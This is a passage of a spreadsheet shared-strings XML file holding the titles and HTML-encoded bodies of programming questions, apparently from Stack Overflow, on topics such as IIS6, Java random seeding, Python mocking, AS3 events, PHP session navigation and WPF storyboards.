    <t>IIS6 is not finding .asp files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hoping someone can provide an answer with this, although it's not 100% programming related.  All of a sudden my IIS6 install on Server 2003 will give me a "404 Not Found" error when I try to load any file ending in .asp.  &lt;/p&gt;
&lt;p&gt;I can see the file there if I turn on directory browsing, but clicking on it immediately gives me a 404.  Regular HTML pages load just fine, it's only the ASP files that it cannot find, although they're right in the directory alongside the HTML file.&lt;/p&gt;
&lt;p&gt;I'm probably forgetting something stupid - can someone remind me what I need to do in order to get it to load properly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio Shortcut for Automatically Creating Constructors from an Inherited Class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I am inheriting from a class with several "overloaded" constructors.&lt;/p&gt;
&lt;p&gt;By any chance is there a short cut in Visual Studio which writes the constructors in the derived class with the same signatures as in the default class for me, with boilerplate code which calls MyBase.New(...) and plugs in the arguments for me?&lt;/p&gt;
&lt;p&gt;EDIT:  As far as I can find there is no such shortcut built-in, however there is one in resharper as suggested by Raymond.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the LD_PRELOAD trick?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I came across a reference to it recently on &lt;a href="http://www.reddit.com/r/programming/comments/7o8d9/tcmalloca_faster_malloc_than_glibcs_open_sourced/c06wjka"&gt;proggit&lt;/a&gt; and (as of now) it is not explained.&lt;/p&gt;
&lt;p&gt;I suspect &lt;a href="http://stackoverflow.com/questions/335108/hide-symbols-in-shared-object-from-ld#335253"&gt;this&lt;/a&gt; might be it, but I don't know for sure.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you post data with a link</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a database which holds the residents of each house in a certain street. I have a 'house view' php web page which can display an individual house and residents when given the house number using 'post'. I also have a 'street view' web page which gives a list of houses. What I want to know is if you can have links on the street view which will link to the house view and post the house number at the same time without setting up a form for each?&lt;/p&gt;
&lt;p&gt;Regards&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Seeding java.util.Random with consecutive numbers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've simplified a bug I'm experiencing down to the following lines of code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    int[] vals = new int[8];
    for (int i = 0; i &amp;lt; 1500; i++)
        vals[new Random(i).nextInt(8)]++;
    System.out.println(Arrays.toString(vals));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The output is: [0, 0, 0, 0, 0, 1310, 190, 0]&lt;/p&gt;
&lt;p&gt;Is this just an artifact of choosing consecutive numbers to seed Random and then using nextInt with a power of 2?  If so, are there other pitfalls like this I should be aware of, and if not, what am I doing wrong?  (I'm not looking for a solution to the above problem, just some understanding about what else could go wrong)&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Dan, well-written analysis.  As the javadoc is pretty explicit about how numbers are calculated, it's not a mystery as to why this happened as much as if there are other anomalies like this to watch out for-- I didn't see any documentation about consecutive seeds, and I'm hoping someone with some experience with java.util.Random can point out other common pitfalls.&lt;/p&gt;
&lt;p&gt;As for the code, the need is for several parallel agents to have repeatably random behavior who happen to choose from an enum 8 elements long as their first step.  Once I discovered this behavior, the seeds all come from a master Random object created from a known seed.  In the former (sequentially-seeded) version of the program, all behavior quickly diverged after that first call to nextInt, so it took quite a while for me to narrow the program's behavior down to the RNG library, and I'd like to avoid that situation in the future.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to call a .net webservice using jquery?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to call a .net webservice from another domain using only jquery.&lt;/p&gt;
&lt;p&gt;What is the best way to do this? and are there any configuration changes I need to be aware of on the web site hosting the web page?&lt;/p&gt;
&lt;p&gt;The reason I ask this, is that I am only marginally in control of that area. 
So I can only make limited changes.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I mock the Python method OptionParser.error(), which does a sys.exit()?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to unit test some code that looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def main():
    parser = optparse.OptionParser(description='This tool is cool', prog='cool-tool')
    parser.add_option('--foo', action='store', help='The foo option is self-explanatory')
    options, arguments = parser.parse_args()
    if not options.foo:
        parser.error('--foo option is required')
    print "Your foo is %s." % options.foo
    return 0
if __name__ == '__main__':
   sys.exit(main())
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With code that looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@patch('optparse.OptionParser')
def test_main_with_missing_p4clientsdir_option(self, mock_optionparser):
    #
    # setup
    #
    optionparser_mock = Mock()
    mock_optionparser.return_value = optionparser_mock
    options_stub = Mock()
    options_stub.foo = None
    optionparser_mock.parse_args.return_value = (options_stub, sentinel.arguments)
    def parser_error_mock(message):
        self.assertEquals(message, '--foo option is required')
        sys.exit(2)
    optionparser_mock.error = parser_error_mock
    #
    # exercise &amp;amp; verify
    #
    self.assertEquals(sut.main(), 2)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm using &lt;a href="http://www.voidspace.org.uk/python/mock.html"&gt;Michael Foord's Mock&lt;/a&gt;, and nose to run the tests.&lt;/p&gt;
&lt;p&gt;When I run the test, I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  File "/Users/dspitzer/Programming/Python/test-optparse-error/tests/sut_tests.py", line 27, in parser_error_mock
    sys.exit(2)
SystemExit: 2
----------------------------------------------------------------------
Ran 1 test in 0.012s
FAILED (errors=1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that OptionParser.error does a sys.exit(2), and so main() naturally relies on that.  But nose or unittest detects the (expected) sys.exit(2) and fails the test.&lt;/p&gt;
&lt;p&gt;I can make the test pass by adding "return 2" under the parser.error() call in main() and removing the sys.exit() call from parser_error_mock(), but I find it distasteful to modify the code under test to allow a test to pass.  Is there a better solution?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: &lt;a href="http://stackoverflow.com/users/3002/df"&gt;df&lt;/a&gt;'s answer works, although the correct call is "self.assertRaises(SystemExit, sut.main)".&lt;/p&gt;
&lt;p&gt;Which means the test passes whatever the number is in the sys.exit() in parser_error_mock(). Is there any way to test for the exit code?&lt;/p&gt;
&lt;p&gt;BTW, the test is more robust if I add:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;self.assertEquals(optionparser_mock.method_calls, [('add_option', ('--foo',), {'action': 'store', 'help': 'The foo option is self-explanatory'}), ('parse_args', (), {})])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;at the end.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update 2&lt;/strong&gt;: I can test for the exit code by replacing "self.assertRaises(SystemExit, sut.main)" with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;try:
    sut.main()
except SystemExit, e:
    self.assertEquals(type(e), type(SystemExit()))
    self.assertEquals(e.code, 2)
except Exception, e:
    self.fail('unexpected exception: %s' % e)
else:
    self.fail('SystemExit exception expected')
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to create custom MouseEvent.CLICK event in AS3 (pass parameters to function)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This question doesn't relate only to MouseEvent.CLICK event type but to all event types that already exist in AS3. I read a lot about custom events but until now I couldn't figure it out how to do what I want to do. I'm going to try to explain, I hope you understand:&lt;/p&gt;
&lt;p&gt;Here is a illustration of my situation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for(var i:Number; i &amp;lt; 10; i++){
    var someVar = i;
     myClips[i].addEventListener(MouseEvent.CLICK, doSomething);
}
function doSomething(e:MouseEvent){ /* */ }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I want to be able to pass &lt;em&gt;someVar&lt;/em&gt; as a parameter to &lt;em&gt;doSomething&lt;/em&gt;. So I tried this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for(var i:Number; i &amp;lt; 10; i++){
    var someVar = i;
    myClips[i].addEventListener(MouseEvent.CLICK, function(){
        doSomething(someVar);
    });
}
function doSomething(index){ trace(index); }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This kind of works but not as I expect. Due to the function closures, when the MouseEvent.CLICK events are actually fired the &lt;em&gt;for&lt;/em&gt; loop is already over and &lt;em&gt;someVar&lt;/em&gt; is holding the last value, the number &lt;em&gt;9&lt;/em&gt; in the example. So every click in each movie clip will call &lt;em&gt;doSomething&lt;/em&gt; passing &lt;em&gt;9&lt;/em&gt; as the parameter. And it's not what I want.&lt;/p&gt;
&lt;p&gt;I thought that creating a custom event should work, but then I couldn't find a way to fire a custom event when the MouseEvent.CLICK event is fired and pass the parameter to it. Now I don't know if it is the right answer.&lt;/p&gt;
&lt;p&gt;What should I do and how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Curing the "Back Button Blues"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ever stumbled on a tutorial that you feel is of great value but not quite explained properly? That's my dilemma. I know &lt;a href="http://www.tonymarston.net/php-mysql/backbuttonblues.html" rel="nofollow"&gt;THIS TUTORIAL&lt;/a&gt; has some value but I just can't get it. &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Where do you call each function?&lt;/li&gt;
&lt;li&gt;Which function should be called
first and which next, and which
third?&lt;/li&gt;
&lt;li&gt;Will all functions be called in all files in an application?&lt;/li&gt;
&lt;li&gt;Does anyone know of a better way cure the "Back Button Blues"?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I'm wondering if this will stir some good conversation that includes the author of the article. The part I'm particularly interested in is controlling the back button in order to prevent form duplicate entries into a database when the back button is pressed. Basically, you want to control the back button by calling the following three functions during the execution of the scripts in your application. In what order exactly to call the functions (see questions above) is not clear from the tutorial.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;All forwards movement is performed by
  using my scriptNext function. This is
  called within the current script in
  order to activate the new script.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function scriptNext($script_id)
// proceed forwards to a new script
{
   if (empty($script_id)) {
      trigger_error("script id is not defined", E_USER_ERROR);
   } // if
   // get list of screens used in this session
   $page_stack = $_SESSION['page_stack'];
   if (in_array($script_id, $page_stack)) {
      // remove this item and any following items from the stack array
      do {
         $last = array_pop($page_stack);
      } while ($last != $script_id);
   } // if
   // add next script to end of array and update session data
   $page_stack[] = $script_id;
   $_SESSION['page_stack'] = $page_stack;
   // now pass control to the designated script
   $location = 'http://' .$_SERVER['HTTP_HOST'] .$script_id;
   header('Location: ' .$location); 
   exit;
} // scriptNext
&lt;/code&gt;&lt;/pre&gt;
  &lt;p&gt;When any script has finished its
  processing it terminates by calling my
  scriptPrevious function. This will
  drop the current script from the end
  of the stack array and reactivate the
  previous script in the array.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function scriptPrevious()
// go back to the previous script (as defined in PAGE_STACK)
{
   // get id of current script
   $script_id = $_SERVER['PHP_SELF'];
   // get list of screens used in this session
   $page_stack = $_SESSION['page_stack'];
   if (in_array($script_id, $page_stack)) {
      // remove this item and any following items from the stack array
      do {
         $last = array_pop($page_stack);
      } while ($last != $script_id);
      // update session data
      $_SESSION['page_stack'] = $page_stack;
   } // if
   if (count($page_stack) &amp;gt; 0) {
      $previous = array_pop($page_stack);
      // reactivate previous script
      $location = 'http://' .$_SERVER['HTTP_HOST'] .$previous;
   } else {
      // no previous scripts, so terminate session
      session_unset();
      session_destroy();
      // revert to default start page
      $location = 'http://' .$_SERVER['HTTP_HOST'] .'/index.php';
   } // if
   header('Location: ' .$location); 
   exit;
} // scriptPrevious
&lt;/code&gt;&lt;/pre&gt;
  &lt;p&gt;Whenever a script is activated, which
  can be either through the scriptNext
  or scriptPrevious functions, or
  because of the BACK button in the
  browser, it will call the following
  function to verify that it is the
  current script according to the
  contents of the program stack and take
  appropriate action if it is not.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function initSession()
// initialise session data
{
   // get program stack
   if (isset($_SESSION['page_stack'])) {
      // use existing stack
      $page_stack = $_SESSION['page_stack'];
   } else {
      // create new stack which starts with current script
      $page_stack[] = $_SERVER['PHP_SELF'];
      $_SESSION['page_stack'] = $page_stack;
   } // if
   // check that this script is at the end of the current stack
   $actual = $_SERVER['PHP_SELF'];
   $expected = $page_stack[count($page_stack)-1];
   if ($expected != $actual) {
      if (in_array($actual, $page_stack)) {// script is within current stack, so remove anything which follows
      while ($page_stack[count($page_stack)-1] != $actual ) {
            $null = array_pop($page_stack);
         } // while
         $_SESSION['page_stack'] = $page_stack;
      } // if
      // set script id to last entry in program stack
      $actual = $page_stack[count($page_stack)-1];
      $location = 'http://' .$_SERVER['HTTP_HOST'] .$actual;
      header('Location: ' .$location);
      exit;
   } // if
   ... // continue processing
} // initSession
&lt;/code&gt;&lt;/pre&gt;
  &lt;p&gt;The action taken depends on whether
  the current script exists within the
  program stack or not. There are three
  possibilities:&lt;/p&gt;
  &lt;ul&gt;
  &lt;li&gt;The current script is not in the $page_stack array, in which case it is
  not allowed to continue. Instead it is
  replaced by the script which is at the
  end of the array.&lt;/li&gt;
  &lt;li&gt;The current script is in the
  $page_stack array, but it is not the
  last entry. In this case all
  following entries in the array are
  removed.&lt;/li&gt;
  &lt;li&gt;The current script is the last entry
  in the $page_stack array. This is
  the expected situation. Drinks all
  round!&lt;/li&gt;
  &lt;/ul&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Where do you edit the constructor template on resharper 4.1?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I create a constructor with parameters using Resharper's 'Generate code' feature, I get something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Example{
     private int _x;
     private int _y;
     public Example(int _x, int _y){
         this._x = _x;
         this._y = _y;
     }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to use this naming convention instead:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Example{
     private int _x;
     private int _y;
     public Example(int x, int y){
         _x = x;
         _y = y;
     }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but I don't know if it's possible to edit this constructor template and where.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I start a Storyboard in a Data Template in a Content Control in a User Control from codebehind?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;PHEW.&lt;/p&gt;
&lt;p&gt;I'm serious. I'll spell it out as follows...&lt;/p&gt;
&lt;p&gt;The Storyboard has a Key "myStoryboard". It's held in a DataTemplate with a key "myDataTemplate".&lt;/p&gt;
&lt;p&gt;This data template is used in a ContentControl with the name "myContentControl" by this tag:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ContentControl Name="myContentControl" 
    ContentTemplate="{DynamicResource myDataTemplate}"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The content control is used in my UserControl.  In the UserControl codebehind I've made a keyboard gesture that supposed to start "myStoryBoard" but i'm having no such luck getting to it. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void StartSB(object sender, ExecutedRoutedEventArgs e) 
{ 
  Storyboard sb = (Storyboard) this.TryFindResource("myStoryboard"); 
  sb.Begin(this);  
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;sb is always null here. How can i get the Storyboard?&lt;/p&gt;
&lt;p&gt;UPDATE:&lt;/p&gt;
&lt;p&gt;so playing with TryFindResource() I've managed to get to myDataTemplate&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void StartSB(object sender, ExecutedRoutedEventArgs e) 
{ 
  object sb = this.myContentControl.TryFindResource("myDataTemplate");  
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in the Locals viewer I can see sb is myDataTemplate.  I can see in the tree sb.base.Resources.Keys which is an array of resources in which "myStoryboard" is inside. Oh so close! &lt;/p&gt;
&lt;p&gt;UPDATE2:&lt;/p&gt;
&lt;p&gt;More code complete here. I realize now this may be too spaghettified to explain with words. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;UserControl &amp;gt; 
  &amp;lt;UserControl.Resources&amp;gt;
   &amp;lt;ResourceDictionary&amp;gt;
        &amp;lt;ResourceDictionary.MergedDictionaries&amp;gt;
            &amp;lt;ResourceDictionary Source="Resources\myUCResources.xaml" /&amp;gt;
        &amp;lt;/ResourceDictionary.MergedDictionaries&amp;gt;
    &amp;lt;/ResourceDictionary&amp;gt;
  &amp;lt;/UserControl.Resources&amp;gt;
  &amp;lt;ContentControl Name="myContentControl"  
           ContentTemplate="{DynamicResource myDataTemplate}" 
               Content="{Binding}" /&amp;gt; 
  ... 
&amp;lt;/UserControl&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;now the codebehind for this User control&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace myclass 
{ 
  public partial class myUserControl: UserControl,  System.ComponentModel.INotifyPropertyChanged 
   { 
     ... 
      public myUserControl() 
      { 
         InitializeComponent(); 
         &amp;lt;!--setup keybinding--&amp;gt; 
      } 
      public void KeyBindExecuted(object sender, ExecutedRoutedEventArgs e) 
      { 
         Object sb = this.myContentControl.TryFindResource("myDataTemplate");  
         //sb returns the DataTemplate 
      } 
   } 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And finally the resource dictionary containing the UI stuff and the animation I ultimately want to trigger. (myUCResources.xaml)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ResourceDictionary&amp;gt; 
    &amp;lt;DataTemplate x:Key="myDataTemplate" &amp;gt; 
        &amp;lt;Grid&amp;gt; 
           &amp;lt;!-- elements like buttons --&amp;gt; 
        &amp;lt;/Grid&amp;gt; 
        &amp;lt;DataTemplate.Resources&amp;gt; 
            &amp;lt;Storyboard x:Key="myStoryBoard"&amp;gt; 
                &amp;lt;DoubleAnimation&amp;gt;
                     &amp;lt;!-- animation stuff--&amp;gt; 
                &amp;lt;/DoubleAnimation&amp;gt; 
            &amp;lt;/Storyboard&amp;gt; 
        &amp;lt;/DataTemplate.Resources&amp;gt; 
        &amp;lt;DataTemplate.Triggers&amp;gt; 
            &amp;lt;EventTrigger SourceName="aButton" RoutedEvent="Button.Click"&amp;gt;
                  &amp;lt;BeginStoryboard Storyboard="{StaticResource myStoryBoard}" /&amp;gt;
                &amp;lt;/EventTrigger&amp;gt;
        &amp;lt;/DataTemplate.Triggers&amp;gt; 
    &amp;lt;/DataTemplate&amp;gt; 
&amp;lt;/ResourceDictionary&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Update 3: &lt;/p&gt;
&lt;p&gt;ok different approach. Can I use the EventTrigger in the DataTemplate from the codebehind to start the animation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Data structure or algorithm for second degree lookups in sub-linear time?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to select a subset from a large set based on a property or predicate in less than &lt;code&gt;O(n)&lt;/code&gt; time?&lt;/p&gt;
&lt;p&gt;For a simple example, say I have a large set of authors. Each author has a one-to-many relationship with a set of books, and a one-to-one relationship with a city of birth.&lt;/p&gt;
&lt;p&gt;Is there a way to efficiently do a query like "get all books by authors who were born in Chicago"? The only way I can think of is to first select all authors from the city (fast with a good index), then iterate through them and accumulate all their books (&lt;code&gt;O(n)&lt;/code&gt; where &lt;code&gt;n&lt;/code&gt; is the number of authors from Chicago).&lt;/p&gt;
&lt;p&gt;I know databases do something like this in certain joins, and Endeca claims to be able to do this "fast" using what they call "Record Relationship Navigation", but I haven't been able to find anything about the actual algorithms used or even their computational complexity.&lt;/p&gt;
&lt;p&gt;I'm not particularly concerned with the exact data structure... I'd be jazzed to learn about how to do this in a &lt;a href="https://en.wikipedia.org/wiki/Relational_database_management_system" rel="nofollow"&gt;RDBMS&lt;/a&gt;, or a key/value repository, or just about anything.&lt;/p&gt;
&lt;p&gt;Also, what about third or fourth degree requests of this nature? (Get me all the books written by authors living in cities with immigrant populations greater than 10,000...) Is there a generalized n-degree algorithm, and what is its performance characteristics?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I am probably just really dense, but I don't see how the inverted index suggestion helps. For example, say I had the following data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DATA
1.  Milton        England
2.  Shakespeare   England
3.  Twain         USA
4.  Milton        Paridise Lost
5.  Shakespeare   Hamlet
6.  Shakespeare   Othello
7.  Twain         Tom Sawyer
8.  Twain         Huck Finn
INDEX
"Milton"         (1, 4)
"Shakespeare"    (2, 5, 6)
"Twain"          (3, 7, 8)
"Paridise Lost"  (4)
"Hamlet"         (5)
"Othello"        (6)
"Tom Sawyer"     (7)
"Huck Finn"      (8)
"England"        (1, 2)
"USA"            (3)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Say I did my query on "books by authors from England". Very quickly, in &lt;code&gt;O(1)&lt;/code&gt; time via a hashtable, I could get my list of authors from England: &lt;code&gt;(1, 2)&lt;/code&gt;. But then, for the next step, in order retrieve the books, I'd have to, for EACH of the set &lt;code&gt;{1, 2}&lt;/code&gt;, do ANOTHER &lt;code&gt;O(1)&lt;/code&gt; lookup: &lt;code&gt;1 -&amp;gt; {4}, 2 -&amp;gt; {5, 6}&lt;/code&gt; then do a union of the results &lt;code&gt;{4, 5, 6}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Or am I missing something? Perhaps you meant I should explicitly store an index entry linking Book to Country. That works for very small data sets. But for a large data set, the number of indexes required to match any possible combination of queries would make the  index grow exponentially. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the easiest way to export data from a live google app engine application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm especially interested in solutions with source code available (django independency is a plus, but I'm willing to hack my way through)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is Drupal ready for the enterprise?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is anyone out there using Drupal for large scale, business critical enterprise applications?&lt;/p&gt;
&lt;p&gt;Does Drupal's lack of database transaction support dissuade potential users?&lt;/p&gt;
&lt;p&gt;Are there any other lightweight web-frameworks based on dynamic languages that people are using for these types of apps? What about Java portals such as JBossPortal or Jetspeed as an alternative or a Drupal + J2EE hybrid architecture?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Viewing include dependencies</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of a tool that will analyse a C++ codebase and display a graphical representation of which files include which header files and highlight redundant includes? I've used Understand C++ but it's expensive and became very unwieldy very quickly on a large (and poorly encapsulated) codebase.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any reason I couldn't create a language supporting infix, postfix, and prefix functions, and more?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been mulling over creating a language that would be extremely well suited to creation of DSLs, by allowing definitions of functions that are infix, postfix, prefix, or even consist of multiple words.  For example, you could define an infix multiplication operator as follows (where multiply(X,Y) is already defined):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;a * b =&amp;gt; multiply(a,b)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or a postfix "squared" operator:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;a squared =&amp;gt; a * a
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or a C or Java-style ternary operator, which involves two keywords interspersed with variables:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;a ? b : c =&amp;gt; if a==true then b else c
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Clearly there is plenty of scope for ambiguities in such a language, but if it is statically typed (with type inference), then most ambiguities could be eliminated, and those that remain could be considered a syntax error (to be corrected by adding brackets where appropriate).&lt;/p&gt;
&lt;p&gt;Is there some reason I'm not seeing that would make this extremely difficult, impossible, or just a plain bad idea?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Edit:&lt;/em&gt; A number of people have pointed me to languages that may do this or something like this, but I'm actually interested in pointers to how I could implement my own parser for it, or problems I might encounter if doing so. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to format a string of HTML programatically</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got unformatted html in a string.&lt;/p&gt;
&lt;p&gt;I am trying to format it nicely and output the formatted html back into a string.
I've been trying to use The System.Web.UI.HtmlTextWriter to no avail:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.IO.StringWriter wString = new System.IO.StringWriter();
System.Web.UI.HtmlTextWriter wHtml = new System.Web.UI.HtmlTextWriter(wString);
wHtml.Write(sMyUnformattedHtml);
string sMyFormattedHtml = wString.ToString();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;All I get is the unformatted html,  is it possible to achieve what I'm trying to do here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does each row in a silverlight dataGrid have to have the same "RowDetailsTemplate"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm defining a datagrid's RowDetailsTemplate in the following way:&lt;/p&gt;
&lt;p&gt;RowDetailsTemplate="{StaticResource defaultTemplate}"&lt;/p&gt;
&lt;p&gt;where&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;UserControl.Resources&amp;gt;
    &amp;lt;DataTemplate x:Key="defaultTemplate"&amp;gt;
        &amp;lt;StackPanel&amp;gt;
            &amp;lt;TextBlock Text="default" x:Name="_txt" /&amp;gt;
        &amp;lt;/StackPanel&amp;gt;
    &amp;lt;/DataTemplate&amp;gt;
    &amp;lt;DataTemplate x:Key="otherTemplate"&amp;gt;
        &amp;lt;StackPanel&amp;gt;
            &amp;lt;TextBlock Text="other" x:Name="_txt" /&amp;gt;
        &amp;lt;/StackPanel&amp;gt;
    &amp;lt;/DataTemplate&amp;gt;
&amp;lt;/UserControl.Resources&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way to programatically define which of the two above DataTemplates a given row is to use (perhaps in the LoadingRowDetails() event)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to create a GUID/UUID using the iPhone SDK</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to be able to create a GUID/UUID on the iPhone and iPad. &lt;/p&gt;
&lt;p&gt;The intention is to be able to create keys for distributed data that are all unique. Is there a way to do this with the iOS SDK?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a good reference for Joomla 1.5 development?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been hacking together some basic Joomla 1.5 components and modules recently and always every time I get into it, I end up tearing my hair out because I simply do not understand how the MVC pattern works. Some examples of the problems I run into:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How does the view get access the model?&lt;/li&gt;
&lt;li&gt;How do you switch to a different view?&lt;/li&gt;
&lt;li&gt;How do you even include the correct file which defines the model?&lt;/li&gt;
&lt;li&gt;etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm sure that there are very simple answers to all my questions: my main problem is that overall I don't feel the "documentation" is useful at all and definitely doesn't provide enough information about how to develop components/modules in the new MVC style. The API website is almost worse-than-useless since all it provides are class trees of the  functions with virtually no comments at all. The docs website is targetted to administrators and core developers only.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Is there any useful source of information for web developers using Joomla 1.5?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NSNumberFormatter for rounding up float values</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a CGFloat value which I want to round to 3 digits after the decimal point. How should I do this?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you nest C preprocessor directives?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For instance, is the following possible:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define definer(x) #define #x?
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Javascript Drag and Drop Grid</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a script that would allow me to have a grid of draggable divs (used to organize &lt;a href="http://imgfave.com/?view=thumb"&gt;image thumbnails&lt;/a&gt;). So when one div is dragged over another, the divs would shift to create an empty spot to drop the div.&lt;/p&gt;
&lt;p&gt;I know jQuery has a drag and drop lib, but it doesn't seem to allow for the functionality I need (snapping to a grid and moving of surrounding divs).&lt;/p&gt;
&lt;p&gt;Anyone know of a script or framework that has what I need?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Do I Get External LIbrary Like Html Agility To Work In My C# Project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I use a free library, such as Html Agility in my Visual Studio Express C# programs?  Obviously I have downloaded it.  What I need to know is how do I set it up so I can simply use a "using" statement to link up with the classes.  Html Agility does not come with any .dll's so do I need to compile it to dll, and then reference to that dll?&lt;/p&gt;
&lt;p&gt;If so, how do you compile to dll in Visual Studio Express?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unit testing and mocking email sender in Python with Google AppEngine</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a newbie to python and the app engine.&lt;/p&gt;
